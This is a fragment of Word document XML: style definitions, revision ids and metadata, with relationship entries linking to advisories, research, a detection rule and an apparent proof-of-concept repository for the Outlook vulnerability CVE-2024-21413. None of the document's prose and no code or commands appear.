    <w:rsid w:val="0072409B"/>
    <w:rsid w:val="00733A10"/>
    <w:rsid w:val="00734497"/>
    <w:rsid w:val="007523B7"/>
    <w:rsid w:val="00762E21"/>
    <w:rsid w:val="00796A32"/>
    <w:rsid w:val="007F7367"/>
    <w:rsid w:val="008374B1"/>
    <w:rsid w:val="00846FF1"/>
    <w:rsid w:val="008546CA"/>
    <w:rsid w:val="00870FF5"/>
    <w:rsid w:val="00887639"/>
    <w:rsid w:val="008E2B4D"/>
    <w:rsid w:val="009045CF"/>
    <w:rsid w:val="00905934"/>
    <w:rsid w:val="009C4987"/>
    <w:rsid w:val="009D69CF"/>
    <w:rsid w:val="00A245A3"/>
    <w:rsid w:val="00A24D27"/>
    <w:rsid w:val="00A33B66"/>
    <w:rsid w:val="00A45BDA"/>
    <w:rsid w:val="00A675FB"/>
    <w:rsid w:val="00A73F64"/>
    <w:rsid w:val="00B61C0D"/>
    <w:rsid w:val="00BD7130"/>
    <w:rsid w:val="00BF003C"/>
    <w:rsid w:val="00C0764B"/>
    <w:rsid w:val="00C75A4A"/>
    <w:rsid w:val="00CC7436"/>
    <w:rsid w:val="00CE0857"/>
    <w:rsid w:val="00D3730F"/>
    <w:rsid w:val="00D47D3B"/>
    <w:rsid w:val="00D561EF"/>
    <w:rsid w:val="00D66BB3"/>
    <w:rsid w:val="00DA2356"/>
    <w:rsid w:val="00E04C86"/>
    <w:rsid w:val="00E148E7"/>
    <w:rsid w:val="00E54130"/>
    <w:rsid w:val="00E958AB"/>
    <w:rsid w:val="00ED0607"/>
    <w:rsid w:val="00EF41B0"/>
    <w:rsid w:val="00F654EC"/>
    <w:rsid w:val="00F92A6E"/>
    <w:rsid w:val="00F974C1"/>
    <w:rsid w:val="00F9762D"/>
    <w:rsid w:val="00FC63B6"/>
    <w:rsid w:val="00FE04FA"/>
    <w:rsid w:val="00FF2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BE145"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2B82A47F-7E33-4E8F-B296-0DCF9E21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1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71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1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1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1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1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71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1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1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1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130"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00BD7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130"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00BD7130"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00BD7130"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00BD7130"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00BD7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130"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00BD7130"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E2B4D"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E2B4D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00837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5D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D2E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D5D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D2E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00563E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MNatic/CVE-2024-21413"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github.com/Neo23x0/signature-base/blob/master/yara/expl_outlook_cve_2024_21413.yar"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www.catalog.update.microsoft.com/Home.aspx"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windows/win32/com/url-moniker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msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413"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hyperlink" Target="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413"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research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-pictur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twitter.com/cyb3rops/status/1758792873254744344" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cve.org/CVERecord?id=CVE-2024-21413"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1A75D-AF15-4F76-83AF-131D29723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17</Pages>
  <Words>1246</Words>
  <Characters>7104</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>59</Lines>
  <Paragraphs>16</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105</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-02T16:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-03T17:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>